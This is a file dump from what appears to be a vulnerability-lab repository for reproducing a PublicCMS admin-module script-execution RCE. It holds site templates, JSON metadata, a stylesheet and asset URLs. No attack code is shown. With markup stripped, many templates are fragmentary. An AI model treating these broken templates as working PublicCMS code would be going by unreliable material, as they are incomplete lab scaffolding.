/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/member/registerMail.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ${user.nickName},请验证您的邮箱地址【${site.name}】
6 |
7 |
8 |
17 |
18 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/config.data:
--------------------------------------------------------------------------------
1 | {"site":{"code":"site","description":"站点配置","extendList":null},"wechat":{"code":"wechat","description":"站点配置","extendList":null},"siteAttribute":{"code":"siteAttribute","description":"站点扩展属性,可以在任意模板中使用","extendList":null},"oauth":{"code":"oauth","description":"第三方登录配置","extendList":null},"email":{"code":"email","description":"Mail Configuration","extendList":[]}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/data.data:
--------------------------------------------------------------------------------
1 | {"index.html":{"extendDataList":[{"name":"title","value":"Public CMS - 永久开源JAVA CMS(内容管理系统),提供商用免费版本"},{"name":"keywords","value":"CMS,开源CMS,JAVA CMS,免费CMS,免费商用,SpringMVC CMS,JAVACMS,建站,网站源码,静态化网站,spring boot"},{"name":"description","value":"Public CMS采用2023年新版本主流JAVA技术开发;完全开源,架构科学,轻松支撑千万数据、千万PV;目前已经拥有全球0.0005%的用户,诸多明星网站案例。提供免费版本产品、免费技术支持,为您快速建站,建设大规模站点提供强大驱动,也是企业级项目产品原型的良好选择。"}]}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/email/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/email/metadata.data:
--------------------------------------------------------------------------------
1 | {"register.html":{"alias":"注册邮件","publishPath":"","useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"notice.html":{"alias":"网站动态提醒","publishPath":"","useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/error/403.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | 403 Error
5 |
6 |
7 |
8 |
9 | Sorry, the page you requested is not found!
10 |
11 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/error/404.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | 404 Error
5 |
6 |
7 |
8 |
9 | Sorry, the page you requested is not found!
10 |
11 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/error/metadata.data:
--------------------------------------------------------------------------------
1 | {"404.html":{"alias":"404页面","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"403.html":{"alias":"403页面","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"500.html":{"alias":"500页面","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/ftl/bread.ftl:
--------------------------------------------------------------------------------
1 | 
首页
2 | <#macro echoBread parentId>
3 | <#if parentId?has_content>
4 | <@cms.category id=parentId>
5 | <#if object.parentId?has_content>
6 | <@echoBread object.parentId!/>
7 |
8 | / ${object.name!}
9 |
10 |
11 |
12 | <@echoBread category.id/>
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/ftl/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/ftl/metadata.data:
--------------------------------------------------------------------------------
1 | {"tools.ftl":{"alias":"工具","publishPath":null,"useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":null,"cacheTime":null,"contentType":null,"extendList":null,"parameterTypeMap":null},"bread.ftl":{"alias":"面包屑导航","publishPath":"","useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"comment.ftl":{"alias":"评论","publishPath":"","useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/include/3fccf48a-3b30-4aa1-80f0-0b860eebe7d4.html:
--------------------------------------------------------------------------------
1 |
2 |
${(metadata.extendData.title)!}
3 |
${(metadata.extendData.description)!}
4 |
6 |
7 | <#list page.list as a>
8 |
9 |
10 |
${a.title}
11 |
${(getPlaceAttribute(a.id).description)!}
12 |
13 |
14 |
15 |
16 |
7 | <#list page.list as a>
8 |
9 |
${a.title!}
10 |
13 |
${a.description!}
14 |
15 |
16 |
5 | <#list page.list as a>
6 |
${a.title}
7 |
8 |
2 | 友情链接
3 | <#list page.list as a>
4 |
${a.title}
5 |
6 |
4 | <#list page.list as a>
5 |
${a.title}<#sep>、
6 |
7 |
4 | <#list page.list as a>
5 |
${a.title}<#sep>、
6 |
7 |
\n\t<#-- position -->\n
","style":""}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/include/region.data:
--------------------------------------------------------------------------------
1 | {"e069718d-c9e7-482f-b00d-58ed75bd0fb3":{"id":"e069718d-c9e7-482f-b00d-58ed75bd0fb3","categoryType":"","name":"首页主体区域"},"0b584103-4d6e-4940-8519-f40cbb056db8":{"id":"0b584103-4d6e-4940-8519-f40cbb056db8","categoryType":"","name":"页尾联系方式"},"34daa502-06d6-4724-ba62-724f230be888":{"id":"34daa502-06d6-4724-ba62-724f230be888","categoryType":"","name":"首页首屏下方信息区域"}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/member/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/member/getcsrf.html:
--------------------------------------------------------------------------------
1 | <#if user?has_content&&userId=user.id>{"csrf":"<@tools.csrfToken/>"}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/search/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/system/chapter.txt:
--------------------------------------------------------------------------------
1 | ${content.title}
2 |
3 |
4 | ${getTextFromHtml(text?replace('','\n\n'))?replace('\n\n\n\n','\n\n')!}
5 |
6 | <@cms.contentList parentId=content.parentId endPublishDate=content.publishDate orderField='publishDate' pageIndex=2 pageSize=1>
7 | <#if 2=page.pageIndex><#list page.list as a>
8 | 上一篇 : ${a.title!}
9 | ${site.sitePath}txt/${a.id}.txt
10 |
11 |
12 | <@cms.contentList parentId=content.parentId startPublishDate=content.publishDate orderField='publishDate' orderType='asc' pageIndex=1 pageSize=1><#list page.list as a>
13 | 下一篇 : ${a.title}
14 | ${site.sitePath}txt/${a.id}.txt
15 |
16 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_4/system/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_1/assets/css/style.css:
--------------------------------------------------------------------------------
1 | @charset "utf-8";/* CSS Document */
2 | html,body,ul,li{margin: 0;padding: 0;}
3 | body{background-color:#eee;}
4 | a{color: #333;}
5 | main{background-color:#fff;padding:20px 0;}
6 | header,footer{text-align:center;}
7 | footer{line-height:60px;}
8 | main ul li{width:50%;float:left;list-style: none;}
9 | .site-box{padding:10px;}
10 | .clear{clear:both;}
11 | @media screen and (max-width :800px) {
12 | main ul li{width:100%;}
13 | }
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201209291145162884.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201209291145162884.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201209291602208653.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201209291602208653.jpg
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210091631452563.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210091631452563.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310952338421.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310952338421.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953075326.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953075326.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953287112.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953287112.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953526760.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/201210310953526760.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/banner.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/banner.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/body.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/body.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/head.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/head.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/index.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/index.jpg
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_1.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_1.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_2.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_2.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_a.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/l_a.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/logo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/logo.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/more.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/more.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/nav.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/nav.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/next.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/next.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/num.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/num.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/on1.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/on1.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/p_bg.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/p_bg.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/pro_bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/pro_bg.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/t_pic.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/t_pic.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/top.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/top.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/up.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/images/up.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/js/roll.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_2/assets/js/roll.js
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/action.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/action.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-btn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-btn.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-content.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-content.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-left.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-left.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-right.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/bar-right.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/close.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/close.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/cover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/cover.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/icon.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/icon.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/loading.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/loading.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/next.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/next.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/prev.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/prev.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/thumb-action.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/thumb-action.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/trans.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/gallery/images/trans.gif
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/head-nav.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/head-nav.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/logo.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/map.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/qq.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/qq.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat_account_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat_account_1.jpg
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat_account_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/images/wechat_account_2.jpg
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts0.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts1.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts2.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts3.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_3/assets/ueditor/dialogs/charts/images/charts4.png:
--------------------------------------------------------------------------------
